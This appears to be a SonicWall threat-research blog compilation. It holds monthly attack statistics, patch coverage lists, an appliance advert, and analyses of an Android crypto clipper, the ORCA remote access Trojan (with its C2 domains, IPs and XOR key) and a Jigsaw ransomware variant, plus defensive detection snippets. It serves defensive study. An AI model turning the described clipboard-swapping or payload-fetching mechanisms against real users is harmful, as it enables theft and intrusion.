January 2019 Cyber Threat Data: New Year, New Malware Attack Variants

With the headlines dominated by massive data leaks, you’d be forgiven for thinking that malware attacks have increased exponentially. But SonicWall’s latest figures for January 2019 are currently showing that malware numbers overall trended down for the month.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following attack data in January 2019:

  • 715.8 million malware attacks (31 percent decrease compared to January 2018)
  • 345.3 billion intrusion attempts (12 percent increase)
  • 19 million ransomware attacks (49 percent decrease)
  • 341,196 encrypted threats (32 percent increase)
  • 31,188 new attack variants (102 percent increase)

In addition, in January 2019 the average SonicWall customer faced:

  • 1,700 malware attacks (31 percent decrease from January 2018)
  • 820,273 intrusion attempts (12 percent increase)
  • 45 ransomware attacks (49 percent decrease)
  • 156 encrypted threats (9 percent increase)
  • 18 phishing attacks each day (21 percent increase)

Malware Volume Down, Attack Variants Up

Just because global malware volume is down in January 2019, you shouldn’t be fooled into thinking that new tactics aren’t being tested and optimized.

New Attack Variants Growing

In January 2019, the SonicWall Capture ATP cloud sandbox service identified 1,006 new attack variants per day.

While the number of malware attacks is down from last year, there has been a huge jump in new attack variants over the past 12 months. The SonicWall Capture Advanced Threat Protection (ATP) sandbox service identified 31,188 new attack variants in January, a 102 percent increase over the same month last year. That averages out to more than 1,006 new attack variants discovered, logged and blocked for customers each day.

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about, so they can design and test their security posture to ensure their networks, data, applications and customers are properly protected.

Android crypto clipper monitors the clipboard of its victims

Cryptocurrency mining malware has gained prominence in the last few years, and we have seen a number of crypto-related infections on the Android platform. Malware writers are not content with crypto-miners alone: they now have something new that again aims at stealing cryptocurrency from victims and keeping it for themselves.

The SonicWall Threats Research team observed reports of a new type of cryptocurrency-related Android malware. This sample monitors the clipboard, replaces crypto-related content with the attacker's own, and ultimately aims at sending cryptocurrency to the attacker's accounts.

Infection Cycle

This malware requests the following permissions during installation:

  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET
  • android.permission.WRITE_EXTERNAL_STORAGE

Upon execution the malware appears to be legitimate, but in reality the application performs a dangerous operation in the background.

In the background, this malware monitors the clipboard service on the infected device and acts on the clipboard contents when either of the following conditions holds:

  • The first character of the copied data is 1 or 3 and its length is 34
  • The first two characters of the copied data are 0x and its length is 42

Interestingly, these two criteria match the formats of Bitcoin (BTC) and Ethereum (ETH) wallet addresses.
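The two selection rules above, written out as a check a defender can run over copy/paste events, as an added example that is not code from the original post or from the malware. The wallet-shaped strings are constructed placeholders, not real addresses, and the attacker address is only a stand-in for the one hard-coded in the app.

```python
# Added example: the clipper's two format rules, plus the defender-side check
# that catches a swap. Sample addresses below are constructed placeholders.

BTC_LEGACY_LENGTH = 34   # rule 1: starts with "1" or "3", 34 characters long
ETH_LENGTH = 42          # rule 2: starts with "0x", 42 characters long


def classify_clipboard_text(text):
    """Return "BTC", "ETH" or None using exactly the two rules the clipper applies."""
    if len(text) == BTC_LEGACY_LENGTH and text[0] in ("1", "3"):
        return "BTC"
    if len(text) == ETH_LENGTH and text[:2] == "0x":
        return "ETH"
    return None


def swap_detected(copied, pasted):
    """An address-shaped string should paste exactly as it was copied.

    True means an address-shaped value changed between copy and paste, which is
    the behaviour described for this clipper. Non-address text is ignored.
    """
    return classify_clipboard_text(copied) is not None and copied != pasted


# Constructed placeholders (not real wallets) shaped like BTC and ETH addresses.
SAMPLE_BTC = "1" + "A" * 33
SAMPLE_ETH = "0x" + "a" * 40
ATTACKER_BTC = "3" + "B" * 33   # stand-in for the address configured in the app

# Constructed (copied, pasted) events such as an on-device audit hook would record.
SAMPLE_EVENTS = [
    ("meeting at 10", "meeting at 10"),   # ordinary text, unchanged
    (SAMPLE_ETH, SAMPLE_ETH),             # address pasted intact
    (SAMPLE_BTC, ATTACKER_BTC),           # address replaced: the clipper's signature
]


def audit_paste_events(events):
    """Return the (copied, pasted) pairs in which an address-shaped value was altered."""
    return [(c, p) for c, p in events if swap_detected(c, p)]


if __name__ == "__main__":
    for copied, pasted in audit_paste_events(SAMPLE_EVENTS):
        print("clipboard swap:", copied, "->", pasted)
```

Note that rule 1 only covers 34-character addresses starting with 1 or 3; a string starting with bc1, for instance, is not matched by it, so the check above flags only what this particular clipper targets.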

The Switch

Since cryptocurrency wallet addresses are long alphanumeric strings, a user is most likely to copy and paste a wallet address rather than type it. When the user copies a wallet address in order to send money to it, the malware swaps in the hard-coded address belonging to the attacker and completes the scam.

We copied dummy Ethereum and Bitcoin wallet addresses from websites; every time we pasted an address afterwards, it had already been changed to the one configured in the malicious app:

Background Communication

Important content entered in the malicious app is also copied and sent to the attacker; the image below shows that the passwords we used to create a new vault were captured by the malware:

The malware communicates with the attacker via the Telegram API:

Overall, this is a sneaky Android malware that quietly switches the victim's wallet address with the attacker's in the background. It continues to show malware writers' interest in cryptocurrency and their ongoing efforts to scam victims for money.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.CryptoClipper.CPM (Trojan)

Indicators Of Compromise (IOC):

  • com.lemon.metamask – 24d7783aaf34884677a601d487473f88

Microsoft Security Bulletin Coverage for February 2019

The SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of February 2019. A list of the issues reported, along with SonicWall coverage information, follows:

CVE-2019-0540 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0590 Scripting Engine Memory Corruption Vulnerability
IPS 14016:Scripting Engine Memory Corruption Vulnerability (FEB 19) 4
CVE-2019-0591 Scripting Engine Memory Corruption Vulnerability
IPS 14017:Scripting Engine Memory Corruption Vulnerability (FEB 19) 5
CVE-2019-0593 Scripting Engine Memory Corruption Vulnerability
IPS 13938:HTTP Client Shellcode Exploit 111
CVE-2019-0594 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0595 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0596 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0597 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0598 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0599 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0600 HID Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0601 HID Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0602 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0604 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 14201:Microsoft SharePoint Remote Code Execution 4
CVE-2019-0605 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-0606 Internet Explorer Memory Corruption Vulnerability
IPS 14018:Internet Explorer Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0607 Scripting Engine Memory Corruption Vulnerability
IPS 14019:Scripting Engine Memory Corruption Vulnerability (FEB 19) 6
CVE-2019-0610 Scripting Engine Memory Corruption Vulnerability
IPS 14020:Scripting Engine Memory Corruption Vulnerability (FEB 19) 7
CVE-2019-0613 .NET Framework and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0615 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0616 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0618 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0619 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0621 Windows Kernel Information Disclosure Vulnerability
ASPY5385:Malformed-File exe.MP.56
CVE-2019-0623 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0625 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0626 Windows DHCP Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0627 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0628 Win32k Information Disclosure Vulnerability
ASPY5386:Malformed-File exe.MP.57
CVE-2019-0630 Windows SMB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0631 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0632 Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0633 Windows SMB Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0634 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-0635 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0636 Windows Information Disclosure Vulnerability
ASPY5387:Malformed-File exe.MP.58
CVE-2019-0637 Windows Defender Firewall Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0640 Scripting Engine Memory Corruption Vulnerability
IPS 14023:Scripting Engine Memory Corruption Vulnerability (FEB 19) 8
CVE-2019-0641 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-0642 Scripting Engine Memory Corruption Vulnerability
IPS 14024:Scripting Engine Memory Corruption Vulnerability (FEB 19) 9
CVE-2019-0643 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0644 Scripting Engine Memory Corruption Vulnerability
IPS 14025:Scripting Engine Memory Corruption Vulnerability (FEB 19) 10
CVE-2019-0645 Microsoft Edge Memory Corruption Vulnerability
IPS 14027:Microsoft Edge Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0648 Scripting Engine Information Disclosure Vulnerability
IPS 14026:Scripting Engine Memory Corruption Vulnerability (FEB 19) 11
CVE-2019-0649 Scripting Engine Elevation of Privileged Vulnerability
There are no known exploits in the wild.
CVE-2019-0650 Microsoft Edge Memory Corruption Vulnerability
IPS 14028:Microsoft Edge Memory Corruption Vulnerability (FEB 19) 2
CVE-2019-0651 Scripting Engine Memory Corruption Vulnerability
IPS 14012:Scripting Engine Memory Corruption Vulnerability (FEB 19) 1
CVE-2019-0652 Scripting Engine Memory Corruption Vulnerability
IPS 14013:Scripting Engine Memory Corruption Vulnerability (FEB 19) 2
CVE-2019-0654 Microsoft Browser Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0655 Scripting Engine Memory Corruption Vulnerability
IPS 14014:Scripting Engine Memory Corruption Vulnerability (FEB 19) 3
CVE-2019-0656 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0657 .NET Framework and Visual Studio Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0658 Scripting Engine Information Disclosure Vulnerability
IPS 14015:Scripting Engine Information Disclosure Vulnerability (FEB 19) 1
CVE-2019-0659 Windows Storage Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0660 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0661 Windows Kernel Information Disclosure Vulnerability
ASPY5383:Malformed-File exe.MP.55
CVE-2019-0662 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0664 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0668 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0669 Microsoft Excel Information Disclosure Vulnerability
ASPY5384:Malformed-File xls.MP.65
CVE-2019-0670 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-0671 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0672 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0673 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0674 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0675 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0676 Internet Explorer Information Disclosure Vulnerability
IPS 14021:Internet Explorer Information Disclosure Vulnerability (FEB 19) 1
CVE-2019-0686 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0724 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0728 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0729 Azure IoT Java SDK Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-0741 Azure IoT Java SDK Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0742 Team Foundation Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2019-0743 Team Foundation Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.

Adobe Coverage

CVE-2019-7089
ASPY5381:Malformed-File pdf.MP.326
CVE-2019-7090
ASPY5382:Malformed-File swf.MP.599

7 Reasons to Upgrade to the Next Generation of SonicWall Email Security Appliances

Email security is still a necessity — even as we race toward 2020. That’s because email remains one of the most effective attack vectors for cybercriminals.

In 2018 alone, SonicWall customers faced an average of 4,164 phishing attacks. That’s far too great a risk to your business or enterprise to go unchecked.

Fortunately, SonicWall offers powerful email security appliances that defeat today’s most dangerous email attacks, including phishing, business email compromise (BEC) and ransomware. SonicWall Email Security appliances are ideal for organizations that require a dedicated and powerful on-premise solution.

Explore the top seven reasons to upgrade your existing SonicWall Email Security appliances and deliver high-performance, enterprise-grade email security for your business.

Boost UI Speed, Productivity

Do more. Faster. Increased RAM enables the latest SonicWall Email Security Appliances to provide a more seamless user experience with a faster and more responsive UI. This saves time and effort for administrators managing the email security for the organization.

Why upgrade: The new SonicWall Email Security appliances come with 8 GB (ES 5000), 16 GB (ES 7000) and 32 GB (ES 9000) RAM compared to 2 GB (ES 3300) and 4 GB (ES 4300 and ES 8300) RAM of legacy versions. This significantly improves the processing power and responsiveness of the appliances.

Process More Email Volume, Faster

Faster cores increase the speed and accuracy of processing inbound and outbound emails with lower latency. The 64-bit processors increase the computational power and the speed of these appliances compared to older 32-bit appliances. The 64-bit processors are designed to take advantage of the increased access to memory (i.e., higher RAM), improving the mail processing and UI responsiveness.

Why upgrade: The new appliances have 64-bit processors and improved CPUs that increase email filtering and email throughput capacities compared to legacy appliances.

Store More Files, Emails Locally

More onboard storage memory allows you to increase local storage of message logs, junk email and email backups right on the appliance.

Why upgrade: The new ES appliances have 500 GB (ES 5000), 1 TB (ES 7000) and 2 TB (ES 9000) of onboard storage compared to 250 GB and 750 GB of storage on the old ES series.

Stop Advanced Email Attacks

As SonicWall continues to add advanced threat protection features like Capture ATP Attachment Sandboxing, Advanced URL Protection and more filtering engines, the new appliances provide optimum performance due to increased RAM and processing power.

Why upgrade: Upgrade to the latest hardware to ensure you stay up-to-date with critical firmware patches and updates, and take advantage of new features that stop targeted phishing attacks, email threats and ransomware.

Expand Email Security to Virtual Environments to Reduce Costs

Virtualizing your infrastructure provides many benefits, while significantly improving the cost-effectiveness and performance needed to protect against advanced email threats.

Why upgrade: Enhance scalability and flexibility by expanding virtual infrastructure (e.g., hard disk, RAM and core CPUs) with ease, or move to hosted email security and eliminate infrastructure needs. You can also minimize your upfront investment with low-cost, perpetual virtual appliance software licenses. This virtual approach also lowers ongoing hardware and infrastructure maintenance costs.

Use Cloud-based Service to Improve Security Resiliency, Availability

Avoid business-crippling email downtime, vastly improve Quality of Service (QoS) and workforce productivity.

Why upgrade: SonicWall Hosted Email Security delivers a high degree of business continuity and scalability while fulfilling aggressive SLAs. Hosted Email Security also includes email continuity that allows employees to send and receive email during planned and unplanned outages to mail servers.

Retain Hardware Support and Warranty

Delivering email security is a critical IT function that keeps employees productive and reduces the attack surface available to cyber criminals.

For current users, it is imperative your secure email solution is covered with the right warranty and support services.

SonicWall ES 3300/4300/8300 series appliances entered Limited Retirement Mode (LRM) in April 2018 and are approaching End of Life (EOL) in April 2020. New firmware, starting with ES 9.2, has been released only for 64-bit appliances. The ES 3300/4300/8300 series will not be supported beyond 04/01/2020 for any hardware or firmware issues.

Why upgrade: Every new firmware version is packed with advanced features and capabilities. ES 9.2 is the current recommended firmware and provides Advanced URL Protection. ES 9.2 and above are supported only on the ES 5000 series, 64-bit virtual appliances or 64-bit Windows Server.


About SonicWall Email Security Appliances

SonicWall’s hardened, Linux-based email security appliances defend against advanced email-borne threats such as ransomware, zero-day threats, spear-phishing and business email compromise.

The multi-layered secure email solution provides comprehensive inbound and outbound protection, and is available in a range of hardware appliance options that scale up to 10,000 users per appliance.

Quick Glance: SonicWall Email Security Appliances

Model:                   ES 3300 / ES 4300 / ES 8300 / ES 5000 / ES 7000 / ES 9000
CPU:                     Intel 2.0 GHz Core 2 Duo / 2.13 GHz Xeon Quad Core (one entry for ES 4300 and ES 8300) / Celeron G1820 / Core i3-4330 / Xeon E3-1275 v3
RAM:                     2 GB / 4 GB / 4 GB / 8 GB / 16 GB / 32 GB
Hard Disk:               250 GB / 2 x 250 GB / 4 x 750 GB / 500 GB / 1 TB / 2 TB
Processor:               32-bit / 32-bit / 32-bit / 64-bit / 64-bit / 64-bit
Appliance Status:        In LRM, EOS 4/1/2020 / In LRM, EOS 4/1/2020 / In LRM, EOS 4/1/2020 / Active / Active / Active
Firmware Status:         Not Supported / Not Supported / Not Supported / Full Support / Full Support / Full Support
Enhanced Anti-Phishing:  No / No / No / Yes / Yes / Yes
Advanced URL Protection: No / No / No / Yes / Yes / Yes

Upgrade to SonicWall Email Security

Ready to upgrade to a SonicWall Email Security appliance? Contact your SecureFirst partner today to explore the options that match your business objectives. If you’re not sure who that is, contact SonicWall and we’ll put you in touch.

ORCA, Remote Access Trojan

Overview:

The SonicWall Capture Labs Threat Research Team recently discovered the “ORCA” remote access Trojan. ORCA allows an attacker to manipulate various processes and services from the command line. The attacker can execute arbitrary commands, including uploading and downloading files and performing various other tasks on the file system.

The following DNS names and IP addresses are observed after the Trojan executes:

adda.lengendport.com
tsl.gettrials.com
auty.organiccrap.com

11.38.64.251
123.120.99.228
147.96.68.184
176.31.24.184
202.2.108.142
203.146.251.11
213.147.54.170
23.19.39.19
62.73.174.134
71.183.67.163
91.198.50.31

Static Information:

Encryption Routine & Key:

In IDA Pro, we can locate the key information for how this Trojan was named. Inside function “401200” we see the following XOR routine:

Using the byte array “byte_40A060” as the key to the XOR routine, we can decode the information:

  • 0x06 ^ 0x49 = 0x4f = O
  • 0x30 ^ 0x42 = 0x72 = r
  • 0x2E ^ 0x4D = 0x63 = c
  • 0x2D ^ 0x4C = 0x61 = a
  • 0x24 ^ 0x6F = 0x4B = K
  • 0x1D ^ 0x74 = 0x69 = i
  • 0x19 ^ 0x75 = 0x6C = l
  • 0x1F ^ 0x73 = 0x6C = l
  • 0x28 ^ 0x4D = 0x65 = e
  • 0x21 ^ 0x53 = 0x72 = r

String: “OrcaKiller”
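The XOR decoding step above, carried out on the ten byte pairs the post lists, as an added example that is not the post's own code. Treating the left operand of each pair as the encoded byte and the right operand as the key byte from byte_40A060 is an assumption; XOR is symmetric, so the recovered string is the same either way.

```python
# Added example: the post's XOR routine applied to the listed byte pairs.
# Left column = encoded byte, right column = key byte (byte_40A060) is assumed.
ENCODED = bytes([0x06, 0x30, 0x2E, 0x2D, 0x24, 0x1D, 0x19, 0x1F, 0x28, 0x21])
KEY = bytes([0x49, 0x42, 0x4D, 0x4C, 0x6F, 0x74, 0x75, 0x73, 0x4D, 0x53])


def xor_decode(data, key):
    """XOR each byte of data with the key, repeating the key if data is longer."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_name():
    """Recover the string the Trojan is named after."""
    return xor_decode(ENCODED, KEY).decode("ascii")


def decode_steps():
    """One line per byte, in the same form as the list in the post."""
    return [
        "0x{:02X} ^ 0x{:02X} = 0x{:02X} = {}".format(b, k, b ^ k, chr(b ^ k))
        for b, k in zip(ENCODED, KEY)
    ]


def is_printable_ascii(data):
    """Plausibility check when trying candidate keys against an unknown blob."""
    return all(0x20 <= b < 0x7F for b in data)


if __name__ == "__main__":
    for line in decode_steps():
        print(line)
    print("String:", decode_name())
```

Because XOR is its own inverse, `xor_decode` also turns the plaintext back into the stored bytes with the same key, which is a quick way to confirm a suspected key against other strings in the binary.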

The “OrcaKiller” Trojan calls the Windows Crypto API to generate a pseudo-random number of about 6 bytes. This randomly generated value is prepended to the string “OrcaKiller”, giving “[6 bytes]OrcaKiller”. With both parts of the generated string known, the Trojan uses it to encrypt other pieces of information.

Network Information

The following image shows the DNS name, header content and type, along with the port number used by the Trojan.

The Trojan looks for specific sets of HTML tags. The first set can be seen in the image below as “P” and the terminating tag “/P”. Once the Trojan has found the correct tags it drops into the first command and control function. It then extracts the payload text between the HTML tags and runs it through the decryption routine; the same key used above decrypts the text. Once the payload text has been decrypted, the Trojan treats it as a binary executable, which is written to disk and executed.

Summary of Capabilities:

  • System/network information gathering
  • Keystroke logging
  • Screenshots
  • File upload/download/execute
  • Command shell

SonicWall Gateway AntiVirus provides protection against this threat:

GAV: Orca.RAT_2 (Trojan)

Cyber Security News & Trends

This week, SonicWall highlights how the UK is taking malware seriously, there is an investigation into new vehicles that are vulnerable to cyberattacks, and an update on the average price paid for ransomware.


SonicWall Spotlight

Bill Conner: How the UK Is Taking Malware Seriously – Information Age

  • SonicWall CEO Bill Conner was interviewed by Information Age editor Nick Ismail on the changing cybersecurity landscape, how malware can be region specific, the possibilities of cross-border collaboration, and more.

DCC Inks Distribution Deal With SonicWall

  • IT products distributor Drive Control Corporation (DCC) has been appointed as an official distributor for SonicWall in South Africa.

SMBs Need Layered Security to Defend Their Businesses – Forbes

  • Bill Conner, CEO of SonicWall, talks as part of the Forbes Technology Council on why small and medium businesses (SMBs) need layered cybersecurity. He argues that if you’re running an SMB online, cybercriminals see you as an easy target and, without adequate investment in cyberdefenses, they might just be correct.

Cyber Security News

Is Your Car Hackable? Cybersecurity Experts Say It Might Be – USA Today

  • A modern car is full of small computers, but in a new survey of 15,900 IT security practitioners and engineers in the automotive industry, many acknowledged a huge number of flaws in the cybersecurity makeup of the vehicles. 62 percent of those surveyed say a malicious attack against automotive technologies is likely or very likely to occur in the next 12 months.

Trojan Malware: The Hidden Cyber Threat to Your PC – ZDNet

  • While Ransomware and cryptocurrency mining have been making the headlines recently, ZDNet investigates the quiet growth of Trojan malware – made possible by the huge number of recent breaches leading to targeted phishing emails.

Ransomware Victims Who Pay Cough up $6,733 (on Average) – BankInfoSecurity

  • A new report has found that in the fourth quarter of 2018 ransomware victims who paid the ransom spent, on average, $6,733; an increase of 13 percent from the previous quarter. Unsurprisingly, Bitcoin is the preferred method of payment.

Two Hacker Groups Responsible for 60 Percent of All Publicly Reported Hacks – ZDNet

  • Blockchain analysis firm Chainalysis investigated publicly reported cryptocurrency exchange hacks and concluded that 60 percent could be traced back to two hacking groups.

True Crime: SamSam Ransomware I Am – SC Magazine

  • SamSam may not be the worst malware out there but its impact on enterprise cybersecurity became difficult to ignore in 2018. SC Magazine traces the history of the malware throughout the year.

Report: Nation-State Malware Attack Could Cripple US – BankInfoSecurity

  • A new report has concluded that without improved private and public data co-operation, the US is at risk of being crippled by well-made malware. The report recommends closer technical data sharing and action taken to improve communication between public and private entities.

A Hacker’s Take on Blockchain Security – Forbes

  • With Blockchain seen by some as the solution to cybersecurity problems, Forbes asks a black hat hacker to investigate with them just how true that is. They come across some less obvious stumbling blocks in blockchain security.

In Case You Missed It

Ransomware: "I'm not a Jigsaw variant!"

Since we first reported seeing Jigsaw ransomware back in 2016, we have seen several spinoffs of this ransomware. Because its source code can easily be downloaded from the web, we have reported variants such as the Zapre ransomware here, and it was even possibly used here to teach ethical hacking.

This week the SonicWall Capture Labs Research team has seen yet another Jigsaw ransomware variant, whose writer shamelessly denies that it is just another variant. In its ransom note it addresses security researchers and says “My dear researchers, I’m not a Jigsaw variant!!!!”

Infection Cycle:

This ransomware arrives as a seemingly harmless setup file using the following icon and file properties.

Once executed, it creates the following directories, using the digit “0” in place of the letter “o” to name the Micr0soft and Wind0ws folders, and drops a copy of itself into each:

  • %APPDATA%\Local\MICR0SOFT\dllhost.exe
  • %APPDATA%\Roaming\WIND0WS\svchost.exe

It then encrypts all files with the following file extensions:

.jpg, .jpeg, .raw, .tif, .gif, .png, .bmp, .3dm, .max, .accdb, .db, .dbf, .mdb, .pdb, .sdf, .sql, .dwg, .dxf, .c, .cpp, .cs, .h, .php, .asp, .rb, .java, .jar, .class, .py, .js, .aaf, .aep, .aepx, .plb, .prel, .prproj, .aet, .ppj, .psd, .indd, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .xqx, .ai, .eps, .ps, .svg, .swf, .fla, .as3, .as, .txt, .doc, .dot, .docx, .docm, .dotx, .dotm, .docb, .rtf, .wpd, .wps, .msg, .pdf, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .wav, .mp3, .aif, .iff, .m3u, .m4u, .mid, .mpa, .wma, .ra, .avi, .mov, .mp4, .3gp, .mpeg, .3g2, .asf, .asx, .flv, .mpg, .wmv, .vob, .m3u8, .mkv, .dat, .csv, .efx, .sdf, .vcf, .xml, .ses, .rar, .zip, .zipx, .7zip

It writes a list of all encrypted files to a txt file saved in the following location:

  • %APPDATA%\Roaming\MICR0SOFT_FILES\EncryptedFileList.txt

It appends the “.pennywise” extension to all encrypted files.
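A triage helper for the behaviour described above (targeted extensions, the appended .pennywise marker, and the look-alike folder names), as an added example that is not the post's or the ransomware's code. The extension set is the post's list; a few neighbouring entries are deliberately run together (".sql.dwg", ".js.aaf") the way extension lists often arrive when copied out of a report, to show the parser coping with that. The file paths are constructed for the demonstration.

```python
import ntpath  # Windows path handling regardless of the analyst's own platform

# Added example: the post's extension list, with some adjacent entries run
# together on purpose (".sql.dwg", ".js.aaf", ...) to exercise the parser.
EXTENSION_TEXT = """
.jpg, .jpeg, .raw, .tif, .gif, .png, .bmp, .3dm, .max, .accdb, .db, .dbf, .mdb, .pdb, .sdf,
.sql.dwg, .dxf.c, .cpp, .cs, .h, .php, .asp, .rb, .java, .jar, .class, .py, .js.aaf, .aep,
.aepx, .plb, .prel, .prproj, .aet, .ppj, .psd, .indd, .indl, .indt, .indb, .inx, .idml, .pmd,
.xqx, .ai, .eps, .ps, .svg, .swf, .fla, .as3, .as.txt, .doc, .dot, .docx, .docm, .dotx, .dotm,
.docb, .rtf, .wpd, .wps, .msg, .pdf, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla,
.xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx,
.sldm.wav, .mp3, .aif, .iff, .m3u, .m4u, .mid, .mpa, .wma, .ra, .avi, .mov, .mp4, .3gp, .mpeg,
.3g2, .asf, .asx, .flv, .mpg, .wmv, .vob, .m3u8, .mkv.dat, .csv, .efx, .sdf, .vcf, .xml,
.ses.rar, .zip, .zipx, .7zip
"""

ENCRYPTED_SUFFIX = ".pennywise"
# Folder names from the post, spelled with a zero in place of "o".
DROPPER_FOLDERS = {"MICR0SOFT", "WIND0WS", "MICR0SOFT_FILES"}


def parse_extension_list(text):
    """Turn the printed list into a set of lower-case extensions.

    A token such as ".sql.dwg" is two extensions that lost their separator, so
    every dot inside a token starts a new extension.
    """
    exts = set()
    for token in text.replace("\n", " ").split(","):
        for part in token.strip().split("."):
            if part:
                exts.add("." + part.lower())
    return exts


TARGETED = parse_extension_list(EXTENSION_TEXT)


def original_name(encrypted_name):
    """Recover the pre-encryption file name from a name ending in .pennywise."""
    if encrypted_name.lower().endswith(ENCRYPTED_SUFFIX):
        return encrypted_name[: -len(ENCRYPTED_SUFFIX)]
    return encrypted_name


def triage(paths, targeted=TARGETED):
    """Split Windows paths into (still intact but of a targeted type, already renamed)."""
    at_risk, encrypted = [], []
    for path in paths:
        name = ntpath.basename(path)
        if name.lower().endswith(ENCRYPTED_SUFFIX):
            encrypted.append(path)
        elif ntpath.splitext(name)[1].lower() in targeted:
            at_risk.append(path)
    return at_risk, encrypted


def dropper_path_hits(paths):
    """Paths that pass through one of the look-alike folders named in the post."""
    return [p for p in paths
            if any(seg.upper() in DROPPER_FOLDERS for seg in p.split("\\"))]


# Constructed sample file listing for the demonstration.
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx",
    r"C:\Users\alice\Pictures\holiday.jpg",
    r"C:\Users\alice\Documents\notes.txt.pennywise",
    r"C:\Users\alice\Documents\readme.log",
    r"C:\Users\alice\AppData\Local\MICR0SOFT\dllhost.exe",
    r"C:\Users\alice\AppData\Roaming\MICR0SOFT_FILES\EncryptedFileList.txt",
]

if __name__ == "__main__":
    at_risk, encrypted = triage(SAMPLE_PATHS)
    print("targeted types still intact:", at_risk)
    print("already renamed:", [original_name(ntpath.basename(p)) for p in encrypted])
    print("dropper folder hits:", dropper_path_hits(SAMPLE_PATHS))
```

The triage is purely name-based, so the dropped EncryptedFileList.txt shows up as a targeted type too; the folder-name check is what separates the ransomware's own artifacts from user data.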

Upon successful encryption it launches this ransom note window.

